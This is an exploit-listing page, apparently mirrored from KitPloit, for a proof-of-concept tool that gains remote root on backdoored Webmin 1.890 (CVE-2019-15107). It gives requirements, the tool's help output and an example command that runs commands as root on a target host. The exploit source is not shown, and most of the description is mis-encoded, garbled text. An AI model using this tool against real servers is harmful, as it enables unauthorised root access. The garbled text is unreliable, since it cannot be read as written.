Sploitus

Exploit for Webmin_1.890-POC

kitploit ┬╖ 2026-09-06

Exploit Code

MARKDOWN35 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-N0OBIT4-WEBMIN_1.890-POC
# Webmin 1.890 рд╕рдорд╛рдкреНрдд рд░рд┐рдореЛрдЯ рд░реВрдЯ

## CVE-2019-15107

Webmin рд╕рдВрд╕реНрдХрд░рдг **1.890** рдПрдХ рдмреИрдХрдбреЛрд░ рдХреЗ рд╕рд╛рде рдЬрд╛рд░реА рдХрд┐рдпрд╛ рдЧрдпрд╛ рдерд╛ рдЬреЛ рдЗрд╕рдХреА рдЬрд╛рдирдХрд╛рд░реА рд░рдЦрдиреЗ рд╡рд╛рд▓реЗ рдХрд┐рд╕реА рднреА рд╡реНрдпрдХреНрддрд┐ рдХреЛ рд░реВрдЯ рдХреЗ рд░реВрдк рдореЗрдВ рдХрдорд╛рдВрдб рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░рдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рджреЗ рд╕рдХрддрд╛ рдерд╛ред рд╕рдВрд╕реНрдХрд░рдг 1.900 рд╕реЗ 1.920 рдореЗрдВ рднреА рд╕рдорд╛рди рдХреЛрдб рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдиреЗ рд╡рд╛рд▓рд╛ рдПрдХ рдмреИрдХрдбреЛрд░ рд╢рд╛рдорд┐рд▓ рдерд╛, рд▓реЗрдХрд┐рди рдпрд╣ рдбрд┐рдлрд╝реЙрд▓реНрдЯ Webmin рдЗрдВрд╕реНрдЯреЙрд▓реЗрд╢рди рдореЗрдВ рд╢реЛрд╖рдг рдпреЛрдЧреНрдп рдирд╣реАрдВ рдерд╛ред рдХреЗрд╡рд▓ рддрднреА рдЬрдм рдПрдбрдорд┐рди рдиреЗ Webmin -> Webmin Configuration -> Authentication рдореЗрдВ рд╕рдорд╛рдкреНрдд рдкрд╛рд╕рд╡рд░реНрдб рдмрджрд▓рдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рджреЗрдиреЗ рдХреЗ рд▓рд┐рдП рдЙрд╕ рд╕реБрд╡рд┐рдзрд╛ рдХреЛ рд╕рдХреНрд╖рдо рдХрд┐рдпрд╛ рд╣реЛ, рддреЛ рдЗрд╕рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд┐рд╕реА рд╣рдорд▓рд╛рд╡рд░ рджреНрд╡рд╛рд░рд╛ рдХрд┐рдпрд╛ рдЬрд╛ рд╕рдХрддрд╛ рдерд╛ред

## рдЖрд╡рд╢реНрдпрдХрддрд╛рдПрдБ

рдЗрди рдкреИрдХреЗрдЬреЛрдВ рдХреЛ рд╕реНрдерд╛рдкрд┐рдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдЖрдкрдХреЛ pip3 рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реИред

  * requests
  * argparse
  * os
  * bs4



## рд╕рд╣рд╛рдпрддрд╛ рдореЗрдиреВ

root@kitploit:~
    
    
    $ python3 Webmin_exploit.py --help
    usage: Webmin_exploit.py [-h] -host IP [-port Port] [-cmd Command]
    
    Webmin 1.890 expired Remote Root POC
    
    optional arguments:
      -h, --help    show this help message and exit
      -host IP      Host to attack
      -port Port    Port of the host ~ 10000 is Default
      -cmd Command  Command to execute ~ id is Default
    
    python3 Webmin_exploit.py -host target -port 10000 -cmd id